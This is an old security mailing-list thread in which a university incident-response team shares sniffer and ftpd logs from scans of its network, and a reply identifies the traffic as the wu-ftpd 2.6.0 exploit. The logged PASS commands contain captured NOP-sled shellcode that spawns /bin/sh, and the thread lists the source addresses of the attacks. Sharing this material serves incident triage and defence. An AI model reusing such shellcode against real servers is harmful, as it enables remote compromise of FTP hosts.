Re: New or old FTP exploit?

[Fredrik Ostergren <fredrik.ostergren () FREEBOX COM>]

Hi !
I believe it's the "new" wuftpd2.6.0(1) exploit, I had the 
same attacks on a network and noticed the exact login 
functions using a sniffer, that "bin0sh1" is common for 
the "new" wuftpd exploit.

/ Fredrik Ostergren.

Our /16 has been scanned at least two times from different 
foreign
addresses during the last weeks with an exploit that seems 
to be the
same. On both occasions, the connections are to port 21 
with the
would-be intruder trying to log in as "USER ftp" and "PASS
long-string-with-nops-and-shellcode-in-it". From one of our 
users, I
got the following log saved by sniffit:

<FONT COLOR="#222255">> USER ftp</FONT>
<FONT COLOR="#222255">> USER ftp</FONT>
<FONT COLOR="#222255">> PASS 





1À1Û1É°
F̀1À1ÛC‰ÙA°?̀ëk^1À1ɍ^
ˆFf¹ÿÿ
°'̀1À^
°=̀1À1ۍ^‰
C1ÉþÉ1À^°̀þÉuó1ÀˆF ^°=̀þ°0þȈF1ÀˆF‰v‰F‰óNV°
̀1À1Û°
̀èÿÿÿÿÿÿ0bin0sh1..11</FONT>
<FONT COLOR="#222255">> PASS 





1À1Û1É°
F̀1À1ÛC‰ÙA°?̀ëk^1À1ɍ^
ˆFf¹ÿÿ
°'̀1À^
°=̀1À1ۍ^‰
C1ÉþÉ1À^°̀þÉuó1ÀˆF ^°=̀þ°0þȈF1ÀˆF‰v‰F‰óNV°
̀1À1Û°
̀èÿÿÿÿÿÿ0bin0sh1..11</FONT>

Another user sent me this:

<FONT COLOR="#222255">>Jul 22 05:47:16 yyyyy ftpd[11650]: 
ANONYMOUS FTP LOGIN FROM xxxxxxxxxxxxxxxxxxxx 
[xxx.xxx.xx.xx],</FONT>
<FONT COLOR="#222255">> 





1À1Û1É°
F̀1À1ÛC‰ÙA°?̀ëk^1À1ɍ^^AˆF^Df¹ÿ^A°'̀1À^^A°=̀1À1ۍ^^H‰
C^B1ÉþÉ1À^^H°^L̀þÉuó1ÀˆF^I^^H°=̀þ^N°0þȈF^D1ÀˆF^G‰v^H‰
F^L‰óN^HV^L°^K̀1À1Û°^Àèÿÿÿ0bin0sh1..11</FONT>
<FONT COLOR="#222255">> Jul 22 05:47:27 yyyyy ftpd[11650]: 
FTP session closed Jul 22 07:48:13</FONT>

Could somebody please tell me if this is an old exploit for 
some FTP
deamon, or a new exploit?

We have seen attacks coming from:
 200.255.45.90  ppp50.cruiser.com.br
 212.69.228.245 Legend Internet Ltd

--
Kent Engström,          Linköping University Incident 
Response Team
<A HREF="mailto:kent () unit liu se">kent () unit liu se</A>  
        abuse () liu se
+46 13 28 1744

UNIT, Linköping University; SE-581 83  LINKÖPING; SWEDEN